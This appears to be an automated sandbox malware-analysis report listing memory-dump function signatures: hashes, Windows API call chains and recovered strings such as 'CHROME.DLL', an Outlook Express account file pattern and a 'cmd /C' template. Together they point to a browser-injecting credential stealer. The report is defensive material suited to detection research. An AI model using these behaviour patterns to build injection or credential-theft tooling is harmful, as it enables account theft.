  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
